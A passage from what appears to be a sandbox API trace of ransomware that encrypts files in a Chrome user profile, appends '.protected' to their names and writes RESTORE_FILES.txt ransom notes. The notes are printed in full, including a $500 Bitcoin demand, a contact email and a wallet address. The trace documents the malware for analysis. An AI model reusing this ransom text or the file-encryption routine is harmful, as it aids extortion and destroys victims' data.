halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\lock"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0084.354] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOCK") returned 141 [0084.354] StrStrW (lpFirst="LOCK", lpSrch=".txt") returned 0x0 [0084.354] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOCK") returned 141 [0084.354] StrStrW (lpFirst="LOCK", lpSrch=".rar") returned 0x0 [0084.354] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOCK") returned 141 [0084.354] StrStrW (lpFirst="LOCK", lpSrch=".zip") returned 0x0 [0084.354] ReadFile (in: hFile=0x15c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e064*=0x0, lpOverlapped=0x0) returned 1 [0084.354] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.354] WriteFile (in: hFile=0x15c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e064*=0x0, lpOverlapped=0x0) returned 1 [0084.354] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.354] WriteFile (in: hFile=0x15c, lpBuffer=0x295e03c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x295e03c*, lpNumberOfBytesWritten=0x295e064*=0x4, lpOverlapped=0x0) returned 1 [0084.355] WriteFile (in: hFile=0x15c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e064*=0x30, lpOverlapped=0x0) returned 1 [0084.355] CloseHandle (hObject=0x15c) returned 1 [0084.355] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOCK.protected") returned 151 [0084.355] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOCK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\lock"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOCK.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\lock.protected")) returned 1 [0084.356] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0084.356] lstrcmpiW (lpString1="LOG", lpString2="Windows") returned -1 [0084.356] lstrcmpiW (lpString1="LOG", lpString2="Program Files") returned -1 [0084.356] lstrcmpiW (lpString1="LOG", lpString2="Program Files (x86)") returned -1 [0084.356] lstrcmpiW (lpString1="LOG", lpString2="$Recycle.bin") returned 1 [0084.356] lstrcmpiW (lpString1="LOG", lpString2="System Volume Information") returned -1 [0084.356] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG") returned 140 [0084.356] StrStrIW (lpFirst="LOG", lpSrch=".protected") returned 0x0 [0084.356] lstrcmpW (lpString1="LOG", lpString2="RESTORE_FILES.txt") returned -1 [0084.356] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e01c | out: pbBuffer=0x295e01c) returned 1 [0084.356] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e044*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e044*=0x30) returned 1 [0084.356] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0084.357] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG") returned 140 [0084.357] StrStrW (lpFirst="LOG", lpSrch=".txt") returned 0x0 [0084.357] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG") returned 140 [0084.357] StrStrW (lpFirst="LOG", lpSrch=".rar") returned 0x0 [0084.357] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG") returned 140 [0084.357] StrStrW (lpFirst="LOG", lpSrch=".zip") returned 0x0 [0084.357] ReadFile (in: hFile=0x15c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e064*=0xc3, lpOverlapped=0x0) returned 1 [0084.358] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffff3d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.358] WriteFile (in: hFile=0x15c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0xc3, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e064*=0xc3, lpOverlapped=0x0) returned 1 [0084.358] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.358] WriteFile (in: hFile=0x15c, lpBuffer=0x295e03c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x295e03c*, lpNumberOfBytesWritten=0x295e064*=0x4, lpOverlapped=0x0) returned 1 [0084.358] WriteFile (in: hFile=0x15c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e064*=0x30, lpOverlapped=0x0) returned 1 [0084.358] CloseHandle (hObject=0x15c) returned 1 [0084.358] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG.protected") returned 150 [0084.358] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\log.protected")) returned 1 [0084.359] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0084.359] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="Windows") returned -1 [0084.359] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="Program Files") returned -1 [0084.359] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="Program Files (x86)") returned -1 [0084.359] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="$Recycle.bin") returned 1 [0084.359] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="System Volume Information") returned -1 [0084.359] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\MANIFEST-000001") returned 152 [0084.359] StrStrIW (lpFirst="MANIFEST-000001", lpSrch=".protected") returned 0x0 [0084.359] lstrcmpW (lpString1="MANIFEST-000001", lpString2="RESTORE_FILES.txt") returned -1 [0084.359] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e01c | out: pbBuffer=0x295e01c) returned 1 [0084.359] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e044*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e044*=0x30) returned 1 [0084.359] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\manifest-000001"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0084.360] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\MANIFEST-000001") returned 152 [0084.360] StrStrW (lpFirst="MANIFEST-000001", lpSrch=".txt") returned 0x0 [0084.360] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\MANIFEST-000001") returned 152 [0084.360] StrStrW (lpFirst="MANIFEST-000001", lpSrch=".rar") returned 0x0 [0084.360] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\MANIFEST-000001") returned 152 [0084.360] StrStrW (lpFirst="MANIFEST-000001", lpSrch=".zip") returned 0x0 [0084.360] ReadFile (in: hFile=0x15c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e064*=0x29, lpOverlapped=0x0) returned 1 [0084.361] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffffd7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.361] WriteFile (in: hFile=0x15c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e064*=0x29, lpOverlapped=0x0) returned 1 [0084.361] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.361] WriteFile (in: hFile=0x15c, lpBuffer=0x295e03c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x295e03c*, lpNumberOfBytesWritten=0x295e064*=0x4, lpOverlapped=0x0) returned 1 [0084.361] WriteFile (in: hFile=0x15c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e064*=0x30, lpOverlapped=0x0) returned 1 [0084.361] CloseHandle (hObject=0x15c) returned 1 [0084.361] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\MANIFEST-000001.protected") returned 162 [0084.361] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\manifest-000001"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\MANIFEST-000001.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\manifest-000001.protected")) returned 1 [0084.361] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0084.362] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0084.362] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\RESTORE_FILES.txt") returned 154 [0084.362] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.362] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.362] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0084.363] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.363] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0084.363] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.363] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0084.363] CloseHandle (hObject=0x158) returned 1 [0084.363] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0084.363] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0084.364] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\RESTORE_FILES.txt") returned 121 [0084.364] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.364] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.364] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0084.365] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.365] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0084.365] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.365] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0084.365] CloseHandle (hObject=0x154) returned 1 [0084.365] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.365] lstrcmpiW (lpString1="Top Sites", lpString2="Windows") returned -1 [0084.365] lstrcmpiW (lpString1="Top Sites", lpString2="Program Files") returned 1 [0084.365] lstrcmpiW (lpString1="Top Sites", lpString2="Program Files (x86)") returned 1 [0084.365] lstrcmpiW (lpString1="Top Sites", lpString2="$Recycle.bin") returned 1 [0084.365] lstrcmpiW (lpString1="Top Sites", lpString2="System Volume Information") returned 1 [0084.366] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites") returned 89 [0084.366] StrStrIW (lpFirst="Top Sites", lpSrch=".protected") returned 0x0 [0084.366] lstrcmpW (lpString1="Top Sites", lpString2="RESTORE_FILES.txt") returned 1 [0084.366] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.366] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.366] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\top sites"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.367] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites") returned 89 [0084.367] StrStrW (lpFirst="Top Sites", lpSrch=".txt") returned 0x0 [0084.367] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites") returned 89 [0084.367] StrStrW (lpFirst="Top Sites", lpSrch=".rar") returned 0x0 [0084.367] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites") returned 89 [0084.367] StrStrW (lpFirst="Top Sites", lpSrch=".zip") returned 0x0 [0084.367] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.368] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.368] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.369] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.369] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) 